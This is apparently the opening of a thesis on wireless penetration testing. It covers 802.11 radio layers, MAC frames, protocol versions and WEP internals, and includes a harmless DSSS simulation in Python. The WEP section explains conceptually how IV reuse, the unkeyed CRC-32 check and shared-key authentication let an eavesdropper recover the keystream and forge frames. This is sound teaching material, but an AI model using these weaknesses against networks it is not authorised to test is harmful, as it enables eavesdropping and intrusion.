ABSTRACT

Wireless penetration testing is a new discipline within the information security field and an emerging field of study. The huge adoption of wireless technologies over recent years has made wireless data networks one of the major attack vectors against organizations today. Incident handlers and law enforcement have been forced to deal with the complexity associated with these technologies when managing and responding to security incidents. Thus, the need for new tools that identify exploits and vulnerabilities in a wireless environment has increased in the past few years.

The purpose of this project is to conduct a wireless penetration test and to analyze the software tools needed to conduct such a test in a wireless network. By implementing a testing methodology, the project addresses different types of security flaws that companies face while using wireless networks. Some common tests are discussed, as is the methodology used by the pen-tester to deploy them. Finally, after analyzing all the attacks deployed in the wireless penetration test, security countermeasures are discussed.

TABLE OF CONTENTS

Abstract ............................................................................................................................... ii

Table of Contents............................................................................................................... iii

List of Figures .................................................................................................................... vi

List of Tables ................................................................................................................... viii

1. Introduction and Background ..................................................................................... 1

1.1 Wireless Local Networks.................................................................................... 4

1.1.1 Wireless Transmission Media..................................................................... 6

1.1.2 Wireless MAC layer ................................................................................... 9

1.1.3 IEEE 802.11 Protocols.............................................................................. 15

1.2 802.11 Security ................................................................................................. 18

1.2.1 Eavesdropping and Interference ............................................................... 18

1.2.2 Wired Equivalent Privacy ......................................................................... 21

1.2.3 Wi-Fi Protected Access............................................................................. 25

1.3 Wireless Penetration Testing ............................................................................ 26

1.3.1 Determining What Others Know .............................................................. 28

1.3.2 Mapping the Network ............................................................................... 29

1.3.3 Scanning the System................................................................................. 29

1.3.4 Performing a Vulnerability Assessment ................................................... 31

1.3.5 Penetrating the System.............................................................................. 31

2. Narrative ................................................................................................................... 40

2.1 Setting Up a Penetration Test Lab .................................................................... 41

2.1.1 Isolating the Pen-test Lab ........................................................................ 41

2.1.2 Securing from Unauthorized Access ........................................................ 43

2.1.3 Managing Storage Devices ....................................................................... 44

2.2 Types of Penetration Test labs.......................................................................... 45

2.2.1 Virtual Pen-Test Lab................................................................................. 45

2.2.2 Internal Pen-Test Lab................................................................................ 46

2.2.3 External Pen-Test Lab............................................................................... 47

2.2.4 Project-Specific Pen-test lab ..................................................................... 48

2.2.5 Ad Hoc Lab............................................................................................... 49

2.3 Pen-Test Lab Description ................................................................................. 49

2.3.1 Hardware Description ............................................................................... 49

2.3.2 Software Description ................................................................................ 52

3. System Research ....................................................................................................... 62

3.1 External Pen-test lab ......................................................................................... 62

3.1.1 Cracking WEP .......................................................................................... 68

3.1.2 Cracking WPA-PSK ................................................................................. 73

3.2 Internal Pen-test lab .......................................................................................... 76

3.2.1 Enumeration Attacks................................................................................. 76

3.2.2 Denial of Service Attacks ......................................................................... 79

4. Evaluation and Results.............................................................................................. 81

4.1 External Pen-test lab ......................................................................................... 82

4.1.1 First Scenario ............................................................................................ 82

4.1.2 Second Scenario........................................................................................ 82

4.1.3 Third Scenario........................................................................... 85

4.2 Internal Pen-Test lab ......................................................................................... 85

4.2.1 Vulnerability Assessment ......................................................................... 85

4.2.2 Denial of Service Attacks ......................................................................... 86

5. Future Work .............................................................................................................. 88

6. Conclusion ................................................................................................................ 90

Bibliography and References............................................................................................ 93

Appendix A – Disc Copy................................................................................... 98

LIST OF FIGURES

Figure 1.1 802.11 and the OSI Model .........................................................................................................5

Figure 1.2 Spectrum Use by FHSS and DSSS Technologies .....................................................................7

Figure 1.3 FHSS and DSSS interference coping strategies .......................................................................9

Figure 1.4 Four-way Handshake process .................................................................................................11

Figure 1.5 802.11 WLAN data packet structure ......................................................................................12

Figure 1.6 802.11 MAC Headers ................................................................................................................12

Figure 1.7 Wireless Local Area Network Protocols ................................................................................16

Figure 1.8 Secret Key and IV packets .......................................................................................................21

Figure 1.9 Wired Equivalent Privacy process ..........................................................................................22

Figure 1.10 Shared Key Authentication ...................................................................................................24

Figure 2.1 A Sample Internal Pen-test lab ................................................................................................47

Figure 2.2 A Sample External Pen-test Lab..............................................................................................48

Figure 2.3 Backtrack 3.0 Desktop ..............................................................................................................52

Figure 2.4 NetStumbler Main Screen ........................................................................................................54

Figure 2.5 Graphical representation of Signal Strength..........................................................................55

Figure 2.6 The Kismet Interface ................................................................................................................56

Figure 3.1 External Pen-test Lab ...............................................................................................................62

Figure 3.2 Access Point Broadcasting........................................................................................................63

Figure 3.3 Output of Netstumbler..............................................................................................................64

Figure 3.4 Access Point Broadcasting........................................................................................................65

Figure 3.5 Network Details .........................................................................................................................66

Figure 3.6 Airodump-ng Captures Packets...............................................................................................69

Figure 3.7 Aireplay-ng starting to inject packets .....................................................................................71

Figure 3.8 The packet replay’s attack .......................................................................................................72

Figure 3.9 Aircrack-ng displaying the Key ...............................................................................................73

Figure 3.10 shows the process of searching...............................................................................................75

Figure 3.11 Network Layout.......................................................................................................................76

Figure 3.11 Nmap executing .......................................................................................................77

LIST OF TABLES

Table 1.1 Commonly Hacked Wireless Network Ports ...........................................................................30

Table 2.1 Intel PRO/Wireless 3945 802.11 a/b/g wireless card specifications ........................................50

Table 2.2 Access Point Specifications ........................................................................................................51

Table 2.3 Nmap Options and Scan Types .................................................................................................61

Table 3.1 Nmap Results ..............................................................................................................................77

Table 4.1 Cracking WEP ............................................................................................................................83

1. INTRODUCTION AND BACKGROUND

Wireless security requires slightly different thinking from wired security because it gives potential attackers easy access to the transport medium. This access significantly increases the threat that any security architecture must address [Arbaugh 2003]. The broadcast nature of wireless networking makes traditional link-layer attacks readily available to anyone. Increasingly, companies and individuals are using wireless technology for important communications they want to keep private, such as mobile e-commerce transactions, email, and corporate data transmissions. At the same time, as wireless platforms mature, grow in popularity, and store valuable information, hackers are stepping up their attacks on these new targets. This is a particular problem because wireless devices, including smart cellular phones and personal digital assistants (PDAs) with internet access, were not originally designed with security as a top priority [Miller 2001].

Wireless networks have significantly impacted the world. Through them, information can be sent easily and quickly without the use of any wire. Wireless networks provide all the functionality of wired networks without the physical constraints, and configurations range from simple peer-to-peer to complex networks offering distributed data connectivity and roaming. They also allow end-user mobility within a networked environment and enable physical network portability, which allows LANs to move with the users that make use of them. Furthermore, wireless networks can be used to connect to the internet in countries and regions where the telecom infrastructure is poor [Turnbull 2007].

Because of these advantages the use of wireless networks has increased dramatically over the past few years, changing not only how computers and electronic devices interact, but also allowing for mass networking with little reliance on central infrastructure and for spontaneous communications. According to Andrew A. Vladimirov: “by 2006 the number of shipped wireless networks hardware devices is estimated to exceed 40 million units” [Vladimirov 2004].

With the prolific deployment of wireless networks in recent times, managing this type of network is particularly challenging due to the unreliable and often unprotected nature of the wireless medium. The trade-off for flexibility and mobility is more threats from hackers using scanners to intercept data or gain access to the wireless network. These threats are not the common security issues, such as spyware, weak passwords, and missing patches. This type of network introduces a new set of vulnerabilities from an entirely different perspective: attacks that are either much more difficult or completely impossible to execute against a standard wired network [Siles 2007].

Wireless networks are more susceptible to attacks from outside the organization’s premises than wired LANs are, because no physical connection is required to reach them. This technology has been misused in several ways: as a device for extortion and blackmail, as a means of entry into private networks and systems, and as a means of telecommunication theft. As a result, wireless information security is an emerging field of study and is becoming increasingly important as a means for organizations to identify certain information security risks and abnormal network behavior [Vladimirov 2004].

Although there are many methods of security assessment, such as audit trails and template applications, the only way to truly know how secure a wireless network is, is to test it. “Wireless Penetration testing is the process of attempting to gain access to resources without knowledge of usernames, passwords and other normal means of access” [Stephen 2006]. The main objective of penetration testing is to identify the exploits and vulnerabilities that exist within an organization’s IT infrastructure and to confirm the effectiveness of the security measures that have been implemented. Furthermore, it helps to identify what information is exposed to the public or to the Internet, giving a bird’s-eye perspective on current security. More importantly, penetration testing provides a blueprint for remediation in order to start or enhance a comprehensive information protection strategy [ISS 2008].

In order to deploy a successful penetration test, the test has to be designed to model real-world scenarios as closely as possible. Attack scenarios can be made up so as to model all plausible situations. In fact, the main thing that separates a penetration tester from an attacker is permission. While most other auditing tends to touch only the surface of security, penetration testing is the most effective method, as it is a “proof of concept” that the measures taken to secure the network are not effective [Stephen 2006].

1.1 Wireless Local Networks

As mentioned before, Wireless Local Area Networks (WLANs) provide connectivity between electronic devices without the need for a physical connection. They transmit and receive data over the air via RF technology, combining data connectivity with user mobility. They enable physical network portability, allowing LANs to move with the users that make use of them. Since WLANs eliminate the physical link to the network, an office infrastructure may be peripatetic, free to grow and move to suit the needs of the organization, because the network backbone is no longer hidden behind walls and floors [Siles 2007].

Although the growth and pervasiveness of wireless appears to be inevitable, the path and speed of growth of this technology is not so predictable. WLANs are unlikely to replace traditional wired networks. “Wireless has not yet matured to the point of being suitable for a data-intensive corporate environment. Also, to say that WLANs are completely deployed without wires would not be strictly correct. Unless a piece of equipment is battery-powered, there must be a power cable connection, and a typical configuration has one or more fixed access points that are connected to a LAN via traditional data cable” [Nichols 2002].

The access points broadcast to and receive information from wireless clients that are within transmission range. The transmission range of an access point varies depending on the environment, the antenna, and the transmission power. In environments with few obstacles the coverage area of a single access point can reach up to several hundred feet and support a small group of users without introducing noticeable performance degradation [Turnbull 2007].

In its simplest form, a WLAN comprises a single transceiver, called an access point. Access points, which serve as communication beacons, are connected to a wired network via an Ethernet cable and exist at fixed locations throughout the organization. Network clients with a wireless adapter installed exchange data with the access point. In order to extend a wireless network’s range, more access points need to be introduced near the coverage boundaries of previously deployed broadcast units. The cells then overlap at their perimeters, allowing clients to maintain a connection at all times by moving from cell to cell [Zyren 2007].

IEEE 802.11 is a set of standards for wireless local area network (WLAN) computer communication, developed by the Institute of Electrical and Electronics Engineers LAN/MAN Standards Committee and operating in the 5 GHz and 2.4 GHz public spectrum bands. This set of standards is limited in scope to the Physical (PHY) layer and the Medium Access Control (MAC) sub-layer, as shown in Figure 1.1 [WildPackets 2008].

Figure 1.1 802.11 and the OSI Model [WildPackets 2008]

1.1.1 Wireless Transmission Media

Wireless LANs employ radio frequency (RF) and infrared (IR) electromagnetic waves to transfer data from point to point. The 802.11 family of protocols defines a single MAC layer which interacts with three Physical layers (FHSS, DSSS and IR in the original 1997 standard) [Nichols 2002].

Infrared

Infrared (IR) systems do not make for a practical enterprise WLAN solution and therefore are not widely employed. IR transfers data using frequencies located in close proximity to visible light on the electromagnetic spectrum. The problem is that these high bands have the same limitations as visible light in that they cannot penetrate nontransparent objects such as walls, floors, and ceilings. As a result, WLANs transmitting via IR are restricted to operating within the same room [Nichols 2002].

Wideband Radio Systems: Spread Spectrum

Originally deployed by the military, spread spectrum techniques are methods by which energy generated in a particular bandwidth is deliberately spread in the frequency domain, resulting in a signal with a wider bandwidth; more bandwidth is consumed in exchange for reliability, integrity, and security of communications. These techniques let devices avoid interference and other signal noise in a way not possible with narrowband radio systems, in which data is transmitted and received on a specific frequency. However, the benefits come with a price: wideband communications are noisier and therefore easier to detect [Nichols 2002]. Note that the security benefit belongs to military systems with secret spreading codes. In 802.11 the chipping sequences and hopping patterns are fixed by the standard, so any compliant receiver can demodulate the signal and spread spectrum provides no confidentiality at all.

Spread spectrum comes in two forms: Frequency-Hopping Spread Spectrum and Direct-Sequence Spread Spectrum. Of the two, frequency hopping is less costly to deploy; however, direct sequence has the potential for more widespread use since it has higher data rates, greater range, and a built-in error correction capability. Figure 1.2 illustrates how frequency hopping and direct sequence systems use the spectrum; both are explained more fully below [Chinitz 2007].

Figure 1.2 Spectrum Use by FHSS and DSSS Technologies [Chinitz 2007]

Frequency Hopping Spread Spectrum

Frequency Hopping Spread Spectrum (FHSS) is “the method of transmitting radio signals by rapidly switching a carrier among many frequency channels, using a pseudorandom sequence known to both transmitter and receiver” [Chinitz 2007]. FHSS transmissions can share a frequency band with many types of conventional transmissions with minimal interference. The FHSS side of Figure 1.2 shows two different hopping sequences and how they use different, small slices of the spectrum for short periods of time.

For interference to occur, the conflicting narrowband signal would need to be broadcast at the same frequency and at the same time as the hopping signal. Whenever interference occurs, the devices can continue their data transfer by hopping to the next frequency that is clear. Thus, interference does not break a connection; it only makes throughput degrade gracefully [Nichols 2002].

Direct Sequence Spread Spectrum

Direct-Sequence Spread Spectrum (DSSS) is a method in which the transmitter spreads the signal over a frequency band wider than required to accommodate the information signal, by multiplying the data being transmitted by a pseudorandom sequence of +1 and -1 values. The inserted bits are referred to as chips, and the sequence as a chipping code. By spreading the energy of the original signal into a much wider band, a receiver is able to perform data recovery on the signal based on statistical analysis (correlation against the known code). The ratio of chips per bit is called the “spreading ratio”. A high spreading ratio increases the resistance of the signal to interference [Chinitz 2007].

However, Direct-Sequence Spread Spectrum requires more bandwidth to operate, generally using three non-overlapping frequencies to communicate. The error-correcting capability prevents DSSS from needing to retransmit data that may have been corrupted en route. Even if one or more chips of a bit’s chipping sequence are damaged during transmission, the statistical techniques embedded in the spreading ratio can recover the original data. In practice, DSSS spreading ratios for wireless LANs are quite small. The DSSS portion of Figure 1.2 shows two separate DSSS channels accessing a wide bandwidth in a time-static manner [Chinitz 2007].
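As an added example, not taken from the thesis or from Chinitz, the following Python code models the chipping and correlation described above using the 11-chip Barker sequence that 802.11 specifies for its 1 and 2 Mbit/s DSSS rates. It ignores modulation (DBPSK/DQPSK) and channel noise and works with hard-decision chips, so it shows only the error-correcting effect of the spreading ratio; the data bits and the chip positions hit by interference are constructed for the illustration.

```python
"""Added example (not from the original thesis): direct-sequence spreading
with the 11-chip Barker code that 802.11 DSSS uses at 1 and 2 Mbit/s, and
despreading by correlation at the receiver.  The data bits and the chip
positions hit by interference are constructed for this illustration."""

# The 11-chip Barker sequence fixed by the 802.11 standard, in +1/-1 form.
BARKER_11 = [+1, -1, +1, +1, -1, +1, +1, +1, -1, -1, -1]


def spread(bits, code=BARKER_11):
    """Replace every data bit by a full chipping sequence (spreading ratio = len(code)).

    Bit 1 is sent as the code itself, bit 0 as the inverted code.
    """
    chips = []
    for b in bits:
        sign = 1 if b else -1
        chips.extend(sign * c for c in code)
    return chips


def despread(chips, code=BARKER_11):
    """Recover the bits by correlating each block of chips with the code.

    An undamaged block correlates to +n (bit 1) or -n (bit 0), n = len(code).
    Only the sign is used, so up to (n - 1) // 2 flipped chips per bit are
    corrected without any retransmission.  Returns (bits, correlations).
    """
    n = len(code)
    if len(chips) % n:
        raise ValueError("chip stream length is not a multiple of the code length")
    bits, corr = [], []
    for i in range(0, len(chips), n):
        c = sum(x * y for x, y in zip(chips[i:i + n], code))
        corr.append(c)
        bits.append(1 if c > 0 else 0)
    return bits, corr


def corrupt(chips, positions):
    """Flip the chips at the given indices, modelling narrowband interference hits."""
    out = list(chips)
    for p in positions:
        out[p] = -out[p]
    return out


def demo():
    data = [1, 0, 1, 1, 0, 0, 1, 0]                  # constructed sample bits
    tx = spread(data)                                 # 8 bits -> 88 chips
    # Five hits inside the second bit (chips 11..21) and two inside the last one.
    rx = corrupt(tx, [12, 13, 15, 18, 20, 80, 85])
    decoded, corr = despread(rx)
    return data, decoded, corr


if __name__ == "__main__":
    data, decoded, corr = demo()
    print("sent        :", data)
    print("decoded     :", decoded)
    print("correlations:", corr)   # |c| < 11 marks blocks that absorbed chip errors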

On the other hand, one of the clear advantages that Frequency Hopping Spread Spectrum systems have over Direct-Sequence Spread Spectrum systems is their resilience to interference. While DSSS products spread their transmission power thinly across the spectrum, FHSS networks hop around the entire 2.4 GHz band. Low levels of interference can easily overpower a DSSS transmission. Furthermore, multi-channel DSSS products use statically allocated pieces of the band. Interference in any significant piece of this allocated band will interfere with the transmission, possibly destroying it entirely. This is shown in Figure 1.3 [Nichols 2002].

Figure 1.3 FHSS and DSSS interference coping strategies [Chinitz 2007]

1.1.2 Wireless MAC layer

The 802.11 family specifies a common medium access control (MAC) layer, which provides a variety of functions that support the operation of 802.11-based wireless LANs. In general, the MAC layer is in charge of managing and maintaining communications between 802.11 stations (radio network cards and access points) by coordinating access to a shared radio channel and utilizing protocols that enhance communications over a wireless medium [WildPackets 2008].

The 802.11 set of standards defines two different access methods: the Distributed Coordination Function (DCF) and the Point Coordination Function (PCF), in which the access point acts as the central controller of medium access. PCF has been implemented in only very few hardware devices [WildPackets 2007].

The Distributed Coordination Function is a Carrier Sense Multiple Access with Collision Avoidance (CSMA/CA) mechanism. In CSMA, a station wishing to transmit first listens to the channel for a predetermined amount of time to check for any activity on the channel. If the channel is sensed “idle” the station is permitted to transmit. Whenever the channel is sensed “busy” the station has to defer its transmission for a random interval; this reduces the probability of collisions on the channel [Nichols 2002].

Under CSMA/CA, devices can use a four-way exchange of control packets to gain access to the airwaves. This solves the hidden node problem, which occurs when two stations that cannot hear each other send packets to the access point at the same time and collide because neither is aware of the other. The four-way handshake ensures collision avoidance by solving this problem [WildPackets 2007]. This RTS/CTS handshake is unrelated to the WPA 4-Way Handshake of 802.11i, which derives session keys and is the exchange attacked when cracking WPA-PSK.

Figure 1.4 Four-way Handshake process [WildPackets 2007]

The four-way handshake process starts with the source node sending a short Request To Send (RTS) packet addressed to the intended destination. If the intended destination hears the transmission and is able to receive, it replies with a short Clear To Send (CTS) packet. Then the source node sends the data, and the recipient acknowledges by returning a short acknowledgment packet (ACK) for every transmitted packet received [WildPackets 2007].

Packet Structure and Packet Types

The 802.11 family of LAN protocols uses packets (called frames in the standard) as the means of sending information across the network. 802.11 networks have three basic types of packets: Data, Management and Control packets. The data packet’s header carries all the functionality of the protocol. RF technology and station mobility impose complex requirements on 802.11 WLAN networks, and this added complexity is reflected in the long physical layer convergence protocol (PLCP) headers as well as in the data-rich MAC header. The 802.11 packet structure is shown in Figure 1.5 [WildPackets 2007].

Figure 1.5 802.11 WLAN data packet structure [WildPackets 2007]

Since 802.11 WLANs must be able to form and re-form their membership constantly, and radio transmission conditions themselves can change, coordination becomes a large issue in WLANs. Thus, management and control packets are mainly dedicated to these coordination functions. In addition, the headers of data packets contain more information about network conditions and topology. Figure 1.6 below shows the 802.11 MAC headers [WildPackets 2007].

Figure 1.6 802.11 MAC Headers [WildPackets 2007]

In order to explain all the fields and the values those fields may take in the data header, a complete breakout of the steps followed by a device trying to connect to, and later transmit information on, a WLAN is described below. Furthermore, a list of the types of information that 802.11 WLAN data packet headers convey, and of the types of information carried in management and control packets, is given below.

The first step for a device joining a BSS or IBSS is authentication. This can be an open or a shared key system. If WEP encryption of packet data is enabled, the standard allows shared key authentication, although this is unwise: the challenge is sent in the clear and returned WEP-encrypted, giving an eavesdropper a plaintext/ciphertext pair from which a keystream can be recovered, so open authentication is preferable even on a WEP network. Authentication is handled by a request/response exchange of management packets. The fields that are used are [WildPackets 2007]:

• Authentication ID: This is the name under which the current station authenticated itself on joining the network.

• WEP Enabled: If this field is true, then the payload of the packet (but not the WLAN headers) is encrypted using Wired Equivalent Privacy.

The next step for a device joining a BSS or IBSS is to associate itself with the access point. When roaming, a unit also needs to disassociate and re-associate. All these functions are handled by an exchange of management packets. The current status is shown in packet headers. The packet headers have the following fields [WildPackets 2007]:

• Association: A packet can show the current association of the sender. Association is handled by request/response management packets. Disassociation is also handled with management packets; it is a simple declaration from either an access point or a device.

• BSSID or ESSID: The ID of the access point (BSSID, its MAC address) or of the network (ESSID, the network name). A device can only be associated with one access point (identified by its BSSID) or one IBSS at a time; several access points forming an extended service set may share the same ESSID.

• Probe: Probes are supported by request/response management packets used by roaming devices in search of a particular BSS or access point.

The 802.11 WLAN protocol supports rapid adjustment to changing conditions, always seeking the best throughput. The fields that show this are [WildPackets 2007]:

• Channel: The channel or radio frequency used for the transmission.

• Data rate: The data rate used to transmit the packet.

• Fragmentation: The fragmentation done in 802.11 WLANs is completely independent of any fragmentation imposed by higher level protocols such as TCP/IP. It is based on the fact that a series of short transmissions is less vulnerable to interference in noisy environments. Thus, fragmentation is set dynamically by the protocol in an effort to reduce the number of retransmissions.

• Synchronization: The management packets called “beacons” keep members of a BSS synchronized.

• Power Save: Because wireless devices need to conserve power, the 802.11 protocol uses a number of fields in data packets plus the PS-Poll (power save poll) control packet to let devices remain connected to the network while in power save mode.

To ensure delivery of frames and their correct forwarding, the protocol uses certain header fields and control frames. These fields and control frames are:

• RTS, CTS, ACK: control frames used in the RTS/CTS/data/ACK four-way exchange that supports collision avoidance.

• Version: the version of the 802.11 protocol used in constructing the frame.

• Type and Sub-Type: the type of frame (management, control or data) with a sub-type specifying its exact function.

• Duration: the time, in microseconds, for which the medium should be reserved for the remainder of the transaction of which this frame is a part.

• Length: frame length.

• Retransmission (the Retry bit): it is important to declare which frames are retransmissions.

• Sequence: sequence and fragment numbers in frames let the receiver discard duplicates and reassemble fragments, which reduces retransmissions.

• Order: indicates that the frame is being sent using the strictly ordered service class.

• Addresses: there are four address fields in 802.11 data frames, to accommodate the possibility of forwarding to, from, or through the distribution system.

• To DS / From DS: these two bits state whether the frame is travelling to or from the distribution system, since traffic can be routed from a station using one access point to a station using a different access point somewhere along the wired network. Their values determine how the address fields are interpreted.

1.1.3 IEEE 802.11 Protocols

The IEEE 802.11 set of standards for wireless local area networks defines several physical-layer amendments. The first WLAN standard to gain broad acceptance in the market was 802.11b, followed by 802.11g and 802.11n. Figure 1.7 shows the basic differences among these protocols [WildPackets 2007].


Figure 1.7 Wireless Local Area Network Protocols [Broadcom 2006]

802.11a

According to IEEE 802.11a, WLAN networks operate in the frequency bands marked as U-NII (Unlicensed National Information Infrastructure) at 5 GHz (5.15-5.35 GHz and 5.725-5.825 GHz in the United States) and offer a maximum bit rate of 54 Mbit/s. 802.11a specifies a physical layer for high bit rates based on OFDM (Orthogonal Frequency Division Multiplexing). Since the 2.4 GHz band is heavily used, operating in the 5 GHz band gives this standard a significant advantage. However, the higher frequency has the disadvantage of a shorter effective range than 802.11b/g, because 802.11a signals are absorbed more readily by walls and other solid objects in their path [Zyren 2007].


802.11b

The IEEE 802.11b standard uses direct-sequence spread spectrum (DSSS). Networks using this standard divide the 2.4 GHz band into 14 channels of 22 MHz (11 of them usable in the United States); because adjacent channels overlap, only three of them (1, 6 and 11) can carry non-overlapping communications in the same area. 802.11b has a maximum raw data rate of 11 Mbit/s. However, “due to the CSMA/CA protocol overhead, in practice the maximum 802.11b throughput that an application can achieve is about 5.9 Mbit/s using TCP and 7.1 Mbit/s using UDP” [Broadcom 2006]. Another problem is that 802.11b devices suffer interference from other products operating in the 2.4 GHz band. Yet, with all these limitations, 802.11b was for years the most popular WLAN protocol [Zyren 2007].

802.11g

In June 2003 the IEEE ratified 802.11g, which applied Orthogonal Frequency-Division Multiplexing (OFDM) modulation to the 2.4 GHz band. This combined the best of both worlds: raw data rates up to 54 Mbps on the same radio frequency as the already popular 802.11b, with backward compatibility. Today the vast majority of computer network hardware shipping supports 802.11g, and as technology improves it is becoming easier to support both 2.4 GHz and 5 GHz in the same chipset [Broadcom 2006].


802.11n

At the time of writing 802.11n had not yet been ratified (it was finalized in 2009), but the draft specification was stable enough for hardware makers to start building Wi-Fi cards and routers. The standard provides a variety of optional modes and configurations that dictate different maximum raw data rates. 802.11n improves on the OFDM implementation of 802.11a/g and adds MIMO (multiple spatial streams) and optional 40 MHz channels. A single spatial stream on a 20 MHz channel reaches a raw data rate of 65 Mbps [Broadcom 2006]; the full standard allows up to 600 Mbps with four streams, 40 MHz channels and the short guard interval.

1.2 802.11 Security

The security of WLANs is very important, especially for applications handling valuable information. Since WLANs operate in much the same manner as wired LANs, they harbor many of the same vulnerabilities as a wired LAN, plus some that are specific to WLANs. The first threat is the potential for unauthorized parties to eavesdrop on the radio signals sent between a wireless station and an AP, compromising the confidentiality of private information. The second is unauthorized access, in which an intruder tries to enter a WLAN system disguised as an authorized user. A third threat is interference and jamming, which can seriously degrade bandwidth [Arbaugh 2003].

1.2.1 Eavesdropping and Interference

“Eavesdropping is the act of surreptitiously listening to a private conversation. It

is a passive attack because an eavesdropper can listen to a message without altering the

data” [Kowalski 2006]. The sender and the receiver of the message may not be aware of

the intrusion [Kowalski 2006].


Furthermore, anyone with a compatible receiver within range of the transmission can listen to the message, and since radio signals emitted by a WLAN propagate beyond the area in which they originate and penetrate walls, depending on the strength of the signal, the intruder can be well outside the premises where the WLAN is deployed [Kowalski 2006].

A second threat is the potential for an intruder to enter a WLAN system as if an authorized user, without having the right permissions to do so. This is an active attack, and it can be carried out with a wireless adapter compatible with the targeted network, or by using a compromised device that is already linked to the network. A third threat to WLAN security is radio interference, which can seriously degrade bandwidth. In many cases interference is accidental: since 802.11b WLANs operate in the 2.4 GHz band, other devices such as Bluetooth devices and cordless phones operating in the same band can overlap with WLAN traffic [Hassell 2004].

Of course, interference may also be intentional. An attacker with a powerful transmitter can generate a radio signal stronger than the WLAN signals, disrupting communications. This condition is known as jamming and is a denial-of-service attack. Jamming equipment is readily available to consumers or can be constructed by knowledgeable attackers, and the attack can be carried out from a location some distance from the targeted network [Bellardo 2003].


Although these threats can put the security of a WLAN in serious danger, there are countermeasures that lessen them. According to the IEEE 802.11 standard, WLANs use spread-spectrum technology to transmit data. As mentioned before, spread spectrum was designed to resist eavesdropping, interference and noise: with Direct-Sequence Spread Spectrum, the technique most commonly used (802.11b), an eavesdropper must know the chipping code or code words [Vladimirov 2004].

Furthermore, the eavesdropper must also know the frequency band and the modulation technique in order to read the transmitted signal accurately. Adding to the eavesdropper's difficulties is the fact that spread-spectrum technologies do not interoperate with each other: a WLAN using FHSS cannot communicate with a WLAN using DSSS, and vice versa, and even two systems using the same technique cannot communicate if they use different frequency bands. However, spread spectrum is only secure if the hopping pattern or chipping code is unknown to the eavesdropper, and in 802.11 these parameters are public knowledge because they are published in the standard, together with the modulation method. Using this information, a knowledgeable eavesdropper can build a receiver to intercept and read unprotected signals; in practice any off-the-shelf 802.11 card in monitor mode is such a receiver, so the physical layer provides no confidentiality at all [Chinitz 2007].

The solution for preventing third parties from reading transmitted data is encryption. Wired Equivalent Privacy (WEP) was the first encryption standard available for wireless networks. The purpose of WEP is to give WLAN systems a level of privacy equivalent to that of wired LANs by encrypting the radio signals. A secondary purpose of WEP is to keep unauthorized users out of the WLAN by providing a method of authentication [Arbaugh-Shankar 2001].


1.2.2 Wired Equivalent Privacy

Wired Equivalent Privacy (WEP) uses a secret key that is shared between a wireless station and an access point (AP). All data sent and received between a wireless station and an AP is encrypted using this secret key. The 802.11 standard does not specify how the secret key is established, although it does allow for a key-mapping table that associates a unique key with each device. In most deployments, however, a single key is shared among all stations and APs in a given system [Nichols 2002].

“WEP provides data encryption using a 40-bit or 128-bit secret key and uses the stream cipher RC4 (Pseudo Random Number Generator) for confidentiality and the CRC-32 checksum for integrity. Indeed, two processes are applied to plaintext data: one encrypts the plaintext, and the other protects it from unauthorized modification while it is in transit” [Nichols 2002]. The process starts with the secret key being prefixed by a per-frame 24-bit initialization vector (IV), giving a 64-bit or 128-bit RC4 key. Figure 1.8 shows that the secret key (40 or 104 bits) and the IV (always 24 bits) combined are used to encrypt the data and its checksum (CRC); the “64-bit” and “128-bit” key sizes quoted by vendors count the IV [Tamini 2006].

Figure 1.8 Secret Key and IV packets [Tamini 2006]


This combined key is fed into the RC4 cipher (PRNG), which generates a pseudo-random key stream as long as the frame body. The sender XORs the key stream with the plaintext to produce the cipher text and transmits it to the receiver along with the IV, which travels in clear. The receiver uses the IV and its own copy of the secret key to produce the same key stream as the transmitter, and XORs it with the cipher text to reveal the original plain text [Nichols 2002].

To protect the frame against modification in transit, Wired Equivalent Privacy (WEP) applies an integrity check algorithm (CRC-32) to the plain text. This second process produces a 32-bit Integrity Check Value (ICV), which is appended to the plain text; plain text and ICV are then encrypted together and sent to the receiver along with the IV. The receiver decrypts the frame, recomputes CRC-32 over the recovered plain text and compares the result with the transmitted ICV. If the two ICVs match, the message is accepted as unmodified. Because CRC-32 is a linear function and not a keyed hash, this check provides no cryptographic integrity: anyone who can flip bits in the cipher text can compute the matching change to the ICV. Figure 1.9 illustrates WEP encryption and decryption, respectively [Nichols 2002].

Figure 1.9 Wired Equivalent Privacy process [Tamini 2006]


Despite the intended strength of WEP for protecting the confidentiality and integrity of data, it has limitations and flaws that can only be partially addressed by proper management. The first problem stems from reuse of the Initialization Vector (IV). The IV is included in the unencrypted part of the frame so that the receiver knows which IV to use when generating the key stream for decryption. Because the key stream depends only on the IV and the secret key, every frame sent under the same IV is encrypted with the same key stream. With a 24-bit IV there are only about 16.7 million values, so a busy access point exhausts the space in a matter of hours, and some implementations reset the IV to zero at start-up. If the same IV is reused for subsequent messages, an eavesdropper who knows (or can guess) the plaintext of one of them recovers the key stream for that IV and can decrypt every other message that uses it [Tamini 2006].

Reusing the IV leads to a second problem. Once an attacker knows the key stream for an IV, he can encrypt a message of his own under that IV and, since the CRC-32 ICV can be computed over any plaintext without a key, produce a frame that the AP or wireless station will accept as valid. The 802.11 standard recommends changing the IV after each transmission, which limits, but does not eliminate, both problems. Since it is not required, many implementations do not change the IV frequently enough [Tamini 2006].

Although it is not a security issue, WEP encryption reduces the available bandwidth. 40-bit encryption reduces throughput by about 1 Mbps, and 128-bit encryption by 1 to 2 Mbps. The drop is relatively small, but users still notice it, especially on the legacy FHSS physical layer, whose maximum data rate is only 2 Mbps [Arbaugh 2003].


WEP also provides a means to authenticate stations trying to connect to an access point. It has two authentication types: “a default Open System, whereby all users are permitted to access a WLAN, and shared key authentication, which controls access to the WLAN and prevents unauthorized network access” [Nichols 2002]. Of the two, Shared Key authentication is the one intended to enforce access control. It works by sharing a secret key among all stations and access points in a WLAN system. When a station tries to authenticate to an AP, the AP replies with 128 bytes of random challenge text. The station must encrypt the challenge under WEP with its copy of the shared secret key and send the result back to the AP. The AP decrypts the response using the same shared key and compares it with the challenge text sent earlier; if they are identical, the AP sends a confirmation message and accepts the station into the network. Figure 1.10 shows the shared key authentication process [Cam-Winget 2003]. In practice this exchange makes a WEP network weaker, not stronger: an eavesdropper sees both the clear challenge and its encrypted form, XORs the two, and obtains the RC4 key stream for that IV. That key stream is enough to answer the AP's next challenge without ever knowing the key, and to inject frames of up to 128 bytes.

Figure 1.10 Shared Key Authentication [WildPackets 2007]


